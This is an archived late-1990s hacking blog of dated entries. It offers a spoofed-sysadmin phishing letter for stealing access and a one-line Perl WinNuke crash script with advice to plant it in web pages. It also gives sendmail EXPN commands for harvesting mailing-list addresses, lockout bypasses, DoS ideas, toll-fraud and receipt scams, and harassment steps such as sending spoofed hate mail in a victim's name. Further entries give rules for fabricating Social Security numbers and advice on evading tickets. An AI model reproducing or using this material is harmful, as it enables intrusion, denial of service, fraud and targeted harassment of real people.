
originally found at http://www.s-alchemy.com/rsnake/siteb.html

                                   SITE B
                                      
   WELCOME! Welcome to Site B, the next generation in RSnake's hacking
   corner. This is my newest site! Now, if you haven't been to my
   original corner I suggest you visit there, before looking any further.
   This is just more of the same, with some new stuff, and better
   explinations, and more stuff, and did I mention more stuff? I want
   this site to be as big a hit as my other site was (in entirety) so if
   you have any suggestions that could make it even better, please just
   mail me and tell me what you want to know about.
   This version (Site B) is NO LONGER hosted by the TCN Click here to
   find out why.
   The premise of this specific page is to ween myself away from JUST
   talking about the software side of hacking. That is why I don't call
   this page "RSnake's Hacking Corner II" or something of equal
   awefulness. This page will be devoted toward, not only the software
   aspects of hacking, but also phreaking and social engineering. It will
   deal with just about every aspect of hacking, as WELL as the software.
   I will try to make this page more diverse in it's content, while still
   upholding my standards of fact vs fiction.
   Now, once again, I will give you my warnings about the information
   held on this page. I am mearly writing a few thoughts down for
   educational purposes ONLY! If you go out and do stupid shit on your
   own, don't come crying to me. If I put stuff on here that is OBVIOUSLY
   only for breaking and not for hacking (such as the ping bug)
   understand that it is because I have been thinking about it or have
   interest in it, not because I think you should go and try it. Big
   brother IS watching! With that, on with the page!
     _________________________________________________________________
   
--DATE-8-30-97--SOCIAL ENGINEERING--

        Hello all!  Long time no see!  Well to kick off Site B, and to
prove I am a man of my word, my first entry will have to do with social
engineering, and NOT exploits.  This is usable by ANYONE and not just the
Linux/Unix gurus that you fear so much.  Social engineering is the art of
hacking PEOPLE.  Now, don't think that I am some sort of Nazi, trying to
ge people to conform to an alternate reality or anything, just think of
social engineering as the ability to tell a lie that produces some
predictable (benificial) outcome.  It is just being a con artist (more or
less).  First I will give you a usable aplications, and then talk about
it.  Let's start with a letter (spoofed) from the Sys-Admin of an internet
provider to one of it's paying customers:

     Dear Customer, To provide you, the user, with better security, we
     have recently began to upgrade our system's security. With the
     treat of malicious computer hackers ever present, we have decided
     to beef up our precautionary measures. In doing so, one of our
     automated password protection systems (APPS) decided that your
     password is insecure. Normally we wouldn't call your attention to
     this, however, recently, we received notice in our logs of attempts
     to crack users passwords. We fear your security could be
     compromised. Our APPS has provided you with a substitute to your
     current password that is many times more secure against DES
     cracking programs. For the time being we HIGHLY suggest you use the
     password allocated for you (appended automatically to this letter).
     Please do not reply to this letter directly. If you have further
     questions or comments, feel free to contact our business office
     during standard business hours. Below is our APPS program's
     directions. We ask that you read the directions, write them down
     along with your new password, and then delete this letter to insure
     your privacy. On behalf of our staff, we sincerely apologize for
     this inconvenience, and will update you if anything else directly
     concerns you. We hope you find this new service helpful and
     relitively non-obtrusive. Thank you for your patience and
     understanding. -Sincerely System Administrator
     -------------------APPS PASSWORD CHANGING
     PROCEDURE----------------- This is an automated message: To change
     your password exit out of your mail and go to your $ prompt, and
     then type in.... [add your own stuff] Your new SECURE password to
     enter: b_/0vG8a ------------------------END APPS
     PROCEDURE--------------------------
     
   Now obviously this is rough, and hopefully you will have done research
   on your target, to know how to explain how to change the password.
   (Note: make SURE your new password has only number, letters and
   symbols (minus @ and # (because of the subtractive nature of those two
   symbols on many systems) and NOT control or alt charachters). Most
   people will do what they are told, unless they have REASON to suspect.
   Remember to spoof the e-mail (go to my old hacking corner to read on
   how to do that if you don't already know) so it looks like it is
   comming from root at that provider. This is one of many tricks you can
   use to gain remote access on your target machine. Be creative. I have
   seen at least 20 varations on that theme that would all work. The
   human machine is very flawed and easily exploited. If you get this
   kind of e-mail, EVER, mail it to me and your local sys-admin. I know
   both of us would be very interested to read it. Stay out of trouble!
   Hasta!
     _________________________________________________________________
   
   WORD OF THE DAY: [anisotropic] RSnake's definition: Say you have a
   circle that is 2"x2" inside this window. If it was programmed to have
   isotropic properties, and you changed the horozontal width (to 4"
   instead of 8" for instance) of your screen, the circle would become a
   vertically enlongated elipse (2" tall and 1" wide) because it is
   proportionaly (to the width) the same. An anisotropic circle, however,
   wouldn't change, regardless of the dimentions of the screen you were
   viewing it through. This is how Netscape, and all other hyper text
   browsers handle images, and also a fundamental idea when programming
   in VC++. Hasta!
     _________________________________________________________________
   
   --DATE--9-10-97--WHERE TO LOOK-- Hello! Today I am going to hit on
   where to look for passwords and what to look for when you find
   yourself in a place that might house something interesting (an office
   of some sort). People are stupid. They forget things ALL the time.
   This is something you can take advantage of, BECAUSE, since people
   don't WANT to forget everything they learn every 10 seconds, they have
   a tendancy to write things down. Well, in computer security, this is a
   HUGE hazzard. If you know where to look, you can find the secrets to
   get yourself into the strangest of places. For instance: A friend and
   I found ourselves needing copies of an paper, so my friend's mother
   took us into the back of her office, and let us have free reign on the
   office copy machine. While there, I noticed that was also the same
   room where the office held their dialup modems, and their main system.
   Within five seconds of random searching I had access to the system.
   How? They left a sticky note on the side of their computer (away from
   the door hoping that no one would be able to see it). Obviously the
   secretaries had kept forgetting the password to get into the machine
   so they wrote it down on a sticky note (nice and yellow for the
   passer-byer hacker to notice). Where should you look for these obvious
   places? On the sides of the monitors, on the wall, on file cabinents,
   in the drawers, on the walls of the drawers, under the desk, under a
   book, under the keyboard, under the mouse pad.... Places that would be
   a good candidates to look for the password are anywhere that is a
   "good" hiding place. Just look around. I read once, that the two
   greatest threats to a computer system are the secretaries and temps.
   Well in this case the secretaries were the problem. If you were
   interested, I didn't exp loit the system, since it was a friend and I
   instead told the mother that she should change the system's password
   and gave her a brief talk on computer security. That's where to look.
   Take it easy! Hasta!
     _________________________________________________________________
   
   --DATE--9-12-97--PEDOPHILIA-- I have recently become involved in one
   of the most vast fights on the internet. This is the fight against
   pedophilia. I am the founder of a group called EHAP (Ethical Hackers
   Against Pedophilia). It is not the purpose of this page to talk about
   it, but if you want more information on this group or it's functions,
   please visit our web-site at http://www.hackers.com/ehap to find out
   more. Hasta!
     _________________________________________________________________
   
   --DATE--9-12-97--SPECIAL CHARACHTERS-- On one of the mailing lists
   that I was on, I recieved an e-mail about someone who was compiling a
   program using gcc. The person was annoyed, because "after compiling
   using: gcc 10int.c -o 10int.c it left behind a file called #10int.c#"
   Here is my reply:
   
     Ahh the fun times with "special charachters". Well first of all, if
     you want to HIDE files, you can use ~'s as in: ~rsnake meaning,
     when they try to cd into ~rsnake they instead go no-where but to my
     home directory, unless they know how to get around that... it is
     really easy. just type: rm \#10int.c\# ...the \ says that it is a
     special charachter. that is the same way you would get into that
     directory: cd \~rsnake You can use that trick as you like of
     course.. or even mess with people and call them other users
     names... heheh... That file, incidentally, was created, not by gcc,
     but by your editor. It most likely panicked and left that file as a
     residue when you forcibly quit out. *yawn* Take it easy! Hasta!
     
   In that instance the user mailed me back, and I was right, he had been
   using Xjed (an Xterm (GUI) version of jed (a larger more versital
   version of ed)) and it had panicked out and left behind that file, and
   after issing that command he was able to get rid of it. Simple? Yup!
   Take it easy! Hasta!
     _________________________________________________________________
   
   --DATE--11-13-97--WIN NUKE ETC.-- This is a letter I got in reference
   to the old Win-Nuke bug. Thought it might be interesting to you people
   out there. Take it easy...
   
     > Hi, > Could you explain a little about the win-nuke bug? i.e.
     port number, > end result, how to exploit it, etc. > Thanks Sure,
     the bug is simple, when connecting to port 139 on any unpatched NT
     or 95 machine, all you have to do is send an OOB (out of band)
     packet and the system faults and blue-screens. The end result is
     that your computer get's fried. The only way to use this bug is to
     use a program like win-nuke or build it in PERL (I have seen it in
     one line of Perl) to send a OOB packet to the 139 port. I have a
     copy of winnuke (designed for Linux/UNIX) on my homepage
     (http://www.s-alchemy.com/rsnake) if you are interested. There is a
     theory going around that if you telnet to the 139 port and THEN
     send an OOB packet it will blue-screen patched boxes, but this is
     NOT true. I designed a program similar to Win-nuke called winnewk
     and it was unsucessful in providing any kind of error on patched
     boxes. After talking directly to Microsoft, it was found that this
     rumour was bunk and there is no way that it would be possible. Not
     that it matters... ;) > p.s. very informative page, latest addition
     to my bookmarks Cool... glad to hear it. :) Take it easy. Hasta!
     _________________________________________________________________
   
   --DATE--12-13-97--MORE FOOLPROOF HACKS-- I got this letter a while
   back, and it goes into more of how to get around foolproof than I went
   into on my other site. I want to make something clear to everyone,
   when I post something on this site, I don't mean that it is the ONLY
   way to do something, in lots of cases there are other and perhaps
   better ways to get around security. I just put a few thoughts down on
   this page to make let you guys know there IS a way around these types
   of security. Anyway, here you go... Hasta! -- hello, I just stumbled
   onto your site via skullcap's site, and I am most impressed. I've been
   a long time Mac guy and know other ways to disable FoolProof (I've
   been living with it in school for two years straight). 1. Hold down
   "shift" during startup. This disable's all extensions.This rarely
   works since FoolProof has driver level protection ( this works best on
   crappy classicII's and what have you). It helps if you flik the power
   switch up & down a few times to jar it up a little. 2. Hold down the
   space bar at startup. This only works for system 7.5.x (If it's not,
   it's probably not worth breaking into anyway). This brings up the
   extensions manager control panel. From here you just uncheck FoolProof
   and your set. This is the best way to disable foolproof that I've
   seen. Just be sure to turn it on again when you're finished. 3. Write
   an Applescript that moves the selcted file into another folder other
   than the system folder. Have yet to find the syntax on this, have'nt
   worked on it much. There are other things you can do on a mac after
   you disabled foolproof. DON'T BE LAME AND REFORMATTE THE HARD DRIVE,
   YOU WILL GET CAUGHT. Instead, install resedit and the Forker extension
   and try to decrypt the password that's stored in the preferences in
   the System folder. This isn't really my department but I'm working on
   that aswell and will let you know. Other things to do is to check out
   www.machacks.com and install some of those pranking files into the
   computer. Trust me, you want to check out that site if you have a mac.
   Any way, I love your site keep it cool. Over and Out
     _________________________________________________________________
   
   --DATE--12-15-97--Spoofing DNS in mIRC-- Ever wondered how those
   "3133t" (3133t = eleet = elite) bastards spoof their DNS and IP
   addresses in IRC? Well for the first time it will be explained in
   plain english (sorta). ;) You know that intro screen in mIRC that lets
   you provide mIRC with the information it needs to validate your user
   name ecetera? Well, that is your path to anonymity. Click on that far
   right tab and find the socks control. That is, find the control that
   allows mIRC to use SOCKS firewalls. Now, the trick is to find a server
   that has a firewall that will let you route through it. That is the
   tricky part. Experiment with bigger providers, as they are more likely
   to have a SOCKS firewall installed. Now, put in that server name into
   your socks control, and put in a matching e-mail address. IE: if the
   server is asdf.blah.net put in bruno@asdf.blah.net or bruno@blah.net
   or whatever. It has to be similar to fool anyone. You are now masked
   AND you are protected by that firewall, because, damnit, you ARE using
   it as your personal firewall (SOCKS firewall that is). You win twice!!
   ;) Hasta!
     _________________________________________________________________
   
   --DATE--12-16-97--Breaking out of lame security in Win `95-- Stuck
   using a locked Windows `95 machine? Here are some basic techniques to
   get you out and free to roam around. First of all, carry a boot disk
   with you at all times. A boot disk should consist of at least these
   files: command.com autoexec.bat config.sys Copy them from your own
   machine, or an un-locked machine and put them onto a formatted floppy
   disk. Then put them into the target machine and cycle the power. That
   works in many cases to get to a dos prompt. Another technique is to
   use internet explorer as a shell. How can it be used as a shell? Well,
   type in "c:" as a URL in the "open" common dialogue box. It will then
   give you a directory listing of the machine you are using. From there
   you are free to roam the system. Also, Microsoft Word and Excell have
   the same bugs, but are instead found in the help menu. Explore around,
   you'll find it. Hasta!
     _________________________________________________________________
   
   --DATE--12-17-97--How someone made money off his 800 number-- This is
   an interesting hack I found out about from a friend working at a
   university. It is less technical and more social engineering (for
   those unfamiliar with that term, Social Engineering (S.E. for short)
   is the art of lying to get information or to get what you want (lying
   for a purpose vs. lying for shits and giggles)). This hack involved a
   hacker who was looking for some spare cash. This guy set up his own
   personal 800 charge number (he set it up to make charges per
   phone-call, like 900 numbers do). So it was NOT a toll free charge by
   any means. In fact he made the toll charge extraordinarilly high. I am
   guessing on the order of $10 a minute. So he called up the university,
   and who knows where-else, (local numbers only of course) and was
   routing his number so it was un-traceable (beside the point). Then
   when he got ahold of someone on campus (some lame secretary or
   something) he told them that he was some professor and he needed to
   dial out, but couldn't on his phone, but that it was a toll free
   number. He told her to do it for him, and because she belived it was a
   toll free number it made sence. Thus, she dialed out and the hacker
   stayed on the line for hours at a time (hours * $600/hour = a lot of
   money)!!! If he had more than one phone devoted toward it, he could be
   making litterally thousands of dollars per hour. After thought: he has
   not been caught yet. ;) Hasta!
     _________________________________________________________________
   
   --DATE--12-18-97--Problem in WinGate (new hack)-- WinGate is a program
   that essentially allows a LAN to connect to the net via a dialup
   connect or ISDN. Information on this product can be found at
   http://www.wingate.net/ The problem lies in WinGate allows you to
   telnet to it, and then route out thereby "laundering" your IP address.
   This causes you to become un-traceable, and WinGate is brilliant in
   that it doesn't log your address. So unless you are stupid you can get
   away with it. There are several programs to discover what IPs run
   WinGate out there, and many more in creation. This is a PRIME target
   for bulk spammers and spoofers, as well as hackers alike. This could
   have been fixed by binding it to the inner LANs. Basically anything
   you can do on the internet can be done by this unwilling laundry
   service for your source IP compliments of WinGate.
     _________________________________________________________________
   
   --DATE--12-18-96--Kill Mac with TCP/IP Stack glitch-- Pretty damned
   simple. Pick yourself up a copy of "strobe" and scan the target
   machine from the 1st to the 65535th (last) port. It will have TCP/IP
   overrun and use CPU exhaustion to crash. Pretty simple, I told you.
   And people thought Macs were safe! Pshaw! Hasta!
     _________________________________________________________________
   
   --DATE--12-19-97--Get `em back (revenge)-- Want some real revenge from
   those assholes who flame you? Well, let's assume for a minute that you
   DO have their e-mail address. If you don't then get it, that isn't my
   problem. Now, I hope you know how to spoof e-mail, because if you
   don't you again, are screwed. Now, assuming you know the person's
   e-mail address, and you know how to spoof, send an e-mail spoofed from
   his/her account to all your local extreemists. Send anti-semetic notes
   to the Jewish Coalition, and send pro-semetic stuff to the Nazi, or
   white brotherhood lists. Send core-dumps to the hackers. To every
   extreemist group, send hate-mail to the opposite group from your
   target's address. If you have the person's phone number or address,
   tack it on as a phony signature file for good measure. ;) Now how
   about tangible revenge? Now we are assuming you know the person's real
   name AND their address (again, if you don't that isn't my problem
   (although you might want to try http://www.four11.com)). Go to your
   local library (be careful doing this because someone might think you
   are ripping things off), and go through the periodicals section. Then
   go through every single magazine you can think of that would have
   subscription cards in them. (You can also do this at grocery stores or
   book stores, but don't let anyone think you are shop-lifting). Now
   take all those subscription cards and send them from your target's
   address. If you get serveral hundred and fill them all out, I can
   gaurantee you, that at least one or two of those (assuming they are
   subscription to catalogues etc...) will sell the address and that
   person will be floating in junk mail every day from that point on. The
   best ones to do this with are the r or x rated men's magazines,
   because they sell addresses most often (they have very little scruples
   about such things). It will take a few hours out of your day and will
   cause them more grief than you can know. I don't recommend doing
   either of these tricks unless you hate the person enough to force them
   to change e-mail addresses, phone numbers and possible even move!
   After thought: most of the best hackers I have known go to the library
   on a regular basis. Just food for thought. The library is a great
   place to learn and is a nice change to the stagnant air of the
   computer labs. ;) Please don't get into any trouble guys/gals. Hasta!
     _________________________________________________________________
   
   --DATE--12-21-97--WinNuke in Perl-- Here it is, just a few lines of
   perl and you are good to go! Malicious website designers can modify
   this to kill off any server through cgi (commone gateway interface).
   If someone stuffed this bad-boy into their cgi script on their
   web-page to kill off anyone on a Gates-box. Make sure to change
   your.target.com to the actual address you want to kill... or perhaps
   make it dynamic to kill off people who visit. Hrm... I wonder what the
   result would be if someone hacked, and then put this on the Micro$oft
   website? #!/usr/bin/perl use IO::Socket; IO::Socket::INET
   ->new(PeerAddr=>"your.target.com:139") ->send("bye", MSG_OOB);
     _________________________________________________________________
   
   --DATE--12-22-97--How write and compile C (1st class)-- Well, I am
   finally going to do it. I am going to write down a couple thoughts on
   writing in C. DO NOT ASK ME TO DO IT ANYMORE, as this is a first thing
   for me, and if I get a whole lot of spam about it, I will stop doing
   it. Alright? How do you compile in the programming language, C? Well,
   let's assume you are using Linux or Unix for this task (because
   damnit, it's better!). From your shell you see a $ or a % or a # or
   something similar. Now let's say you have your code called
   "uncompiled_exploit.c" and you want to compile it. It is really very
   easy. Type in this command: gcc -o compiled_exploit
   uncompiled_exploit.c The first string after the -o is what the
   compiled code will be called. The uncompiled code will still be there,
   but it won't run. Now, to run the code you mearly type the name of the
   compiled code into the prompt and voila! The same is true with any C
   compiler, and even with C++, although dealing with libraries can be
   very tricky. For the time being let's just stick with that, shall we?
   Now let's write our first program in C. Why do I choose C to teach?
   Because once you know C you can write in C++ but not the reverse. A
   LOT of code you will find for exploits are written ONLY in C, and if
   you have a good basis on what you are doing in C you will understand
   any code that you encounter (yes, that even includes VC++, sorta).
   This code is very simple. Type it in EXACTLY as I have it typed.
   Spaces and tabs are not important for the most part, but for your
   first program, just do it exactly as I do for lack of ease. Feel free
   to omit the comments: /* first program: first.c this iS a comment
   beacuse it's between the stars and slashes, you will just have to get
   used to these coding conventions */ #include /* this is your standard
   include library for all your c programs. this allows you to use the
   printf() function used below */ int main() { /* the int main crap is
   your main function. everything between the {}'S is your main function
   */ printf ("This is how you print a line in C.\n"); /* the semicolon
   at the end of the line tells you that that line of code is over. the
   \n means that you want to have a carrage return and skip down to the
   next line. */ printf ("You can also put in tabs and quotes" "with the
   \\t and \" commands: " "\"asdf\tasdf\"\n"); /* \t makes tabs, \b
   backspaces, etc... if you want to be able to read a \ put a slash
   before it: \\ like in the above example. you also must use this same
   technique when commenting out quotes. you also may span commands over
   several lines, as shown above in the printf() command */ return 0; /*
   because your main function was declared as an int (an integer) it must
   return a number so that is what the above function does. if you wanted
   to return with an error, you could return with -1, but we will get
   into that later. */ } /* end of main() */ Ok, that was your first
   program. Now to compile it. At your prompt type: gcc -o first first.c
   If it didn't work, type ls -la core and if the line "core not found"
   comes up, you didn't core dump. If a line comes up other than that,
   type: rm core and you will have to fix whatever problem you made. This
   shouldn't happen untill you get further in your programming, but make
   sure you type it in carefully, or it won't work. And now to run it
   just type in: first Pretty straight forward? I hope so. ;) Hasta!
     _________________________________________________________________
   
   --DATE--1-4-98--EXPN majodomo exploit-- This is a relatively new bud
   that was uncovered as a vulnerability in sendmail to uncover the
   subscriber list in a majordomo list. When someone sends an e-mail to a
   majordomo list the mail is piped through an alias that wraps the
   message including some other aliases. One of those aliases also
   includes the real list with all the e-mail addresses of all the
   subscribers in it. The potential harm in this is blatantly obvious. To
   exploit this technique telnet to the sendmail port of the machine in
   question, then EXPN the e-mail address of the majordomo list, and then
   read where the alias goes to. From there, EXPN that alias and poof,
   you have all the e-mail addresses of all the subscribers. E.G.: telnet
   target.net 25 220 target.net ESMP Sendmail 8.8.5/Target-971021-1 ready
   at ... EXPN mail-list-name 250 <"/usr/local/mail/majordomo/wrapper
   resend -l mail-list-name -h target.net
   mail-list-name-list"@target.net> EXPN mail-list-name-list And poof...
   you will have all the e-mail addresses of all the subscribers of the
   mailing list. The second EXPN is the second to last argument of the
   alias (mail-list-name-list). That is where all the account names are
   stored. Thanks to James Ponder for some of the info here.
     _________________________________________________________________
   
   --DATE--1-7-98--How someone made money from his 800 number II--
   Alright, you guys remember the guy calling the university right?
   Alright, well I heared this on a news report on my way to go gamble in
   Reno. Some guy using a normal number (set up like a toll number) calls
   people, and leaves a distressing message about their father or mother
   or something getting into an accident, and that they need to contact
   this number in order to get ahold of this (toll) number. Then when
   they call the number, it is a machine, that is set up with broken
   english, to keep them on the line as long as possible. Also, this same
   person has been reported to use pager numbers and other similar scams.
   He was reported charging as much as $100 a minute (which is a bit hard
   to belive, but that is what the radio said). After thought: he has not
   been caught yet. ;) Hasta!
     _________________________________________________________________
   
   --DATE--1-22-98--Thoughts-- Well, today, I am going to write down a
   few thoughts (technical because I have been thinking about them.
   People often want to know what I am up to these days (because I have
   been falling out of public eye a tad) so I will appease that, and also
   make an entry while I am at it. First of all, the other day I went
   into a chatroom (because I was bored) and people started asking me
   (this was an HTML chat room by the way) if there was a way to stop the
   chatroom. Well, frankly, until that time, I had never thought about
   crashing it, but now that I have thought about it for a little while,
   YES, there IS a way to use CPU exhaustion to basically slow down the
   room to a halt. I haven't written the program personally but I can't
   see that it would be more than 20-30 lines of shell programming at
   most. You could even do it by hand. It would be using the chargen
   port. You would connect to the remote HTML port via telnet on a
   Linux/Unix box and then pipe chargen (off another machine) into it. If
   you bounced a couple signals, I am SURE you could crash the room. It
   would probably not shut down the port, but it would make it so that
   everyone in the room stopped seeing text, etc... Next, I was thinking
   about Kerberos authentication. Here is why I belive Kerberos
   authentication is a BAD idea for small networks. Unless you have a
   single machine that is producing the Kerberos certificates, you are
   running the risk (since it is a multi user system) that someone can
   hack the Kerberos machine and get ahold of the primary name server
   through trust. Trust is evil, and Kerberos THRIVES on trust. If you
   get a Kerberos ticket you are destined for root. A friend of mine got
   on a HUGE (very secure) net- work through a very small private linux
   box on an ISDN (it was an assumed trusted machine (STUPID)). He then
   used that machine to log into one of the bigger machines (multiuser)
   and used some social engineering skills to get access to an even
   bigger machine. And then it was a matter of packet sniffing a
   sys-admin's password to get access to the primary name server, and
   then, thanks to Kerberos, he had access to everything (including the
   ability to add his own machine as a trusted machine). Dumb, if you ask
   me. Next. I have been working with a small company designing some
   really nasty authentication for Credit Cards, etc. So for the first
   time, I am working the security aspect of hacking. I got my hands on
   some fairly interesting RSA source code, that allows me to send
   encrypted data over untrusted lines. The problem lies in that to make
   this work, I have to make every computer that wants to use this
   product be able to access C. That might not seem like a problem, but
   there are lots of systems (ISPs) out there that won't allow C or
   precompiled binaries to be run. So this is something I am going to
   have to work out (without recoding PGP into PERL). Next. I have been
   asked to write for an internet magazine. Now, I am not sure what I am
   going to do, but when/if it ever gets off the ground I will let you
   all know about it. Well... I guess that's it for now... Take it easy
   all. Hasta!
     _________________________________________________________________
   
   --DATE--1-26-98--Making money #3-- Okay, here is one I heared from a
   friend (sorta). Now this requires some on-site "hacking". Okay,
   everyone has heard of those department stores, etc, that pay you the
   difference if they have a discount a week later. For instance say
   something is selling for $45.95 one week, and the next week it goes on
   sale for $38.95, they garuntee you (the customer) that they will pay
   you the difference (the $7 in this case) to avoid "bait and hook"
   lawsuites. So, you find yourself at a department store, what should
   YOU do to take advantage of this? Well collect EVERY receipt that you
   can find. This means in the trashcans out front, and dumpster out back
   (if you can get to it) and any that you might happen accross while in
   the store. Then keep your eyes on the local papers for that store. If
   you happen to notice that something has gone on sale, you just return
   to that store, and collect the money that is owed to you (the bearer
   of the reciept). The best part is that (aside from the loitering part)
   it is completely legal. Stay out of trouble now, you hear? ;) Hasta!
     _________________________________________________________________
   
   --DATE--1-29-98--Mail-- > Hi I'v read your page >
   http://www.s-alchemy.com/rsnake/corner.shtml --kool! > I'd have a
   question: > how do I find out if a and ELF SYSTEM? > what commands? >
   thank's Good question, and one that I am unsure of. I will ask a buddy
   of mine and see if he know the answer. I listed a few on the page. You
   may want to ask your system administrator if he knows in a pinch. I
   will mail You if I find out. You can find out what kind of system you
   are using by typing "uname -a" and then you can check the distribution
   with the manufacturor and ask them if it uses ELF system binaries.
   That's the only thing I can think of off hand. Hasta! > thank's very
   much for that promp reply. Kool! I'v been visiting your > page and
   trying exploits, Kool. I'v tried the rlogin and it worked! > Thank,s
   very much , I'll keep on vititing your cool page Hasta! Well, I talked
   to my friend, and he came up with some interesting ideas (some of
   which I slightly dissagree with). He said there is no (good) way to
   tell if something is an ELF binary by any command, however there are
   some things to check so you can narrow down your search. Do an "ls -al
   /bin/" and if things listed in that directory are large (meaning
   several hundred k for something fairly simple like "ls") then you are
   more likely to be sure that it is an ELF system. He also said that you
   can look at login and see, however, I dissagree, as that is sometimes
   dynamically and sometimes statically compiled, so that is a bad
   example, and could lead you astray. You might also want to do a
   "strings" command on things found in /bin and that might show if it is
   an ELF system, but again, I dissagree and I think you best bet is
   either talk to the distributor, OR look at things found in /bin and
   see if they are huge files (anything over 100,000k is huge). I hope
   that helps. By the way, check out "Site B" sometime, I will put these
   letters on there. ;) Hasta!
     _________________________________________________________________
   
   --DATE--1-30-98--What to do when caught-- I read a REALLY good artical
   in Motercycle World last August and it stuck with me as being one of
   the single greatest papers I have read to date. Motercycle world is
   about just that, motercycles. I don't own one personally currently,
   but I have, and my father does, so I do know quite a bit about the
   sport, and occationally I read the magazine when I am home visiting.
   Regardless, the paper went into what to do when caught on the street
   by police. For reasons of this paper, I am not going to cite the
   paper, because I am going to broaden the scope of what was said
   considerably. A common misnomer is that it is illegal to lie to a
   police officer. This is just plain falacy. It is ABSOLUTLY legal to
   lie to police officers in all but two cases. The first is if the
   officer asks your identity, and the second is if you are NOT a suspect
   in a crime (as that is considered hindering an ongoing investigation).
   However, on the flip side, officers ARE allowed to lie to you. It is a
   known statistic that 90% of all convictions are made by confession
   alone. A police officer doesn't have to prove a thing if you confess.
   So how does an officer get you to confess? Well in the example the
   paper used, when a policeman pulls you over off the side of the road,
   he first asks you "How fast do you think you were going?" Most people
   would either say, "I don't know" or tell the police officer EXACTLY
   how fast they were going. This is considered a confession. What SHOULD
   you do? Well, I am not TELLING you to lie, but let's put it this way,
   unless they used official methods of checking your speed (clocking
   your speed over a certain length of road, or radar checks in approved
   radar-zones) they cannot convict you of anything. By admitting to the
   fact that you were going however fast you were going you are giving up
   your constitutional rights. Police officers are (this is the god's
   honest truth here) TOLD to lie during police academy, to make dealing
   with criminals and the public as a whole easier. I can remember a few
   times when I was pulled over for various reasons, but once when I was
   speeding, the officer asked me what the speed limit was, and I told
   him 35, and he asked me how fast I was going, and I responded, "I
   belive I was going 35, sir." He told me that I was going quite above
   that (which I probably was knowing me and that particular street) but
   because he couldn't prove it, and I didn't admit to it, he had no
   reason to write me a ticket. Our very own Central Intelligence Agency
   (CIA) knows this fact all too well as their inside motto is: "Admit
   nothing. Deny Everything. Make counter accusations." The people who
   are least likely to get traffic violations are lawyers and ex-cons.
   Food for thought. The reason being, they know their constitutional
   rights. More on the traffic issues: There is a way of getting a ticket
   without anyone being around, and this is "photo radar". They have
   cameras at street intersections and they take a picture of your front
   licence plate if you disobey common road safety laws. What do you do
   if you recieve a ticket like this in the mail? Well, according to the
   ex-police officer in this artical you should completely ignore it. The
   ticket does NOT go on your DMV record, and is just a way to generate
   revenue for the state. Photo traffic violations do not constitute
   "service of summons". If you recieve a ticket like this via registered
   mail, refuse to sign, thereby forcing the people who wrote the ticket
   to hire someone to process the ticket at considerable expense. In most
   cases these tickets will be dropped immediately, because it will cost
   the state more money to try to get the money from you than if they
   just ignore your particular violation. The point of this being, know
   your rights. Remain silent when arrested. Talk to your attorney first.
   Know that you CAN lie to police officers. Know that police officers DO
   lie to you. Also, be NICE when talking to police officers. They have a
   shitty job to do, and I think we can all sympathyze with that. They
   are much friendlier and much easier to deal with when you are nice to
   them. They just want the respect that they (in most cases) deserve.
   Smile! Take care out there folks, and stay out of trouble! Hasta!
     _________________________________________________________________
   
   --DATE--1-30-98--Mail-- > hello rsnake, I got a small question if you
   have time to answer. I > recently got a hotmail account and I noticed
   they show TONS of > information about the sender of mail. Is there a
   way to see that > information on normal email (the one that came with
   my prodigy). I'm > using netscape navigator 3.0 if you need to know
   that information. Any > help would be appreciated, thanks. Hrm, are
   you reffering to header information? If so, just save the document (go
   to file then go down to save as) into a html document on your
   hard-drive. Then just view that source with notepad or something
   similar. That will reveal headers. If you aren't talking about
   headers, I am not sure what you are reffering to. Hope that helps.
   Hasta! > Rsnake, the header information is exactly what I was
   referring to. I > know its only superficial information but I couldnt
   figre out a way to > access it. Now that brings up another question,
   if I save it into an > html format, could that activate a virus that
   was inside? Or can you > only get one by downloading an attached file.
   I hate to bother you so > much, but your one of the few people that
   gives straight answers. Thanks > a lot for your help. Hehe... Okay,
   yes, it is possible to execute a virus if you convert an e-mail to
   html AND view it through an html editor/browser. However, the virus
   would have to be written in either Java-script or VBscript (if you
   view the document through MSIExplorer). If it is written in any other
   language, it would have to be run. If you save the document, it will
   not save attachments, however, so you are pretty safe from that. I
   wouldn't recomend viewing headers through a browser though, because it
   will misinterpret certain charachters as part of HTML. Use notepad, or
   wordpad, open it as a .txt file and all will be good. Hope that helps.
   Hasta!
     _________________________________________________________________
   
   --DATE--1-31-98--CHFN Vulnerability (possible)-- Hrm... well, while
   playing around on a local system (that I have access to), I noticed
   something interesting. There is a Linux/Unix command called chfn
   (change finger name) used to change information about a user (such as
   home addy, home phone, "real name" etc...). Anyway, while playing
   around with it, I noticed that it opened an editor to change this
   information. I am not sure of the version of chfn that I was using but
   if yours doesn't open up an editor, you can be sure that this is NOT
   the ver you are using. Anyway, it wrote to a tmp file called
   /tmp/chpass.xxxxxx (the x's are some combination of numbers, but
   suprisingly predictable). The tmp file is based (somewhat) on time. So
   if you made a symbolic link to /bin/bash or something (because chfn is
   suid root) you could theoretically overwrite bash and cause a nasty
   denial of service attack. This has really nasty potential. Of course
   you would have to write a fairly easy shell script (no I am not going
   to write it for you people) to link all the potential files to
   whatever the file is you wish to overwrite. Mind you this is all
   theoretical, and I haven't tested it, but I don't see why it wouldn't
   work. Okay, goodnight all. Hasta!
     _________________________________________________________________
   
   --DATE--1-31-98--SSN-- People have asked me about social security
   numbers, etc... Not much to say about them. Except for a few numbers
   issued in the mid 70s all SSNs have 9 digits. Very few have been
   issued above 595. Anyone's SSN who is between 700-729 is most likely
   older as that was issued by the Railroad Retirement Agency and they
   haven't been assigned since the early 60s. As far as making your own
   SSN, here are some rules of thumb: SSNs never end in four zeros. They
   never start with 73, 79, 6 or 8. Lastly they very rarely start with 9
   as there were very few ever issued. Here is the list of SSN for the
   United States and provinces. Stay out of trouble. Hasta! Alabama
   416-424 Alaska 574 American Samoa 581-585 Arizona 526-527, 600-601
   Akansas 429-432 California 545-573, 602-626 Colorado 521-524
   Connecticut 040-049 Delaware 221-222 District of Columbia 577-579
   Florida 261-267, 589-595 Georgia 252-260 Guam 581-585 Hawaii 575-576
   Idaho 518-519 Illinois 318-361 Indiana 303-317 Iowa 478-485 Kansas
   509-515 Kentucky 400-407 Louisiana 433-439 Maine 004-007 Maryland
   212-220 Massachusetts 010-034 Michigan 362-386 Minnesota 468-477
   Mississippi 425-428, 587-588 Missouri 486-500 Montana 516-517 Nebraska
   505-508 Nevada 530 New Hampshire 001-003 New Jersey 135-158 New Mexico
   525, 585 New York 050-134 North Carolina 237-246 North Dekota 501-502
